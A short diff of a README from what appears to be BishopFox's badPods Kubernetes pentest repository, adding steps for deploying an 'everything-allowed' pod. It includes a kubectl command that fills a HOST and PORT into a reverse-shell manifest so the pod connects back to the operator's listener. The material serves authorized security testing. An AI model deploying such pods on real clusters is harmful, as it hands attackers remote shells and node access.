BishopFox/badPods/manifests/everything-allowed/README.md

 ```

 **Step 2: Create pod from local manifest without modifying it by using env variables and envsubst**

+* Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc.
+* Replace the HOST and PORT values to point the reverse shell to your listener

 ```bash
 HOST="10.0.0.1" PORT="3116" envsubst < ./manifests/everything-allowed/[RESOURCE_TYPE]/everything-allowed-revshell-[RESOURCE_TYPE].yaml | kubectl apply -f -
 ```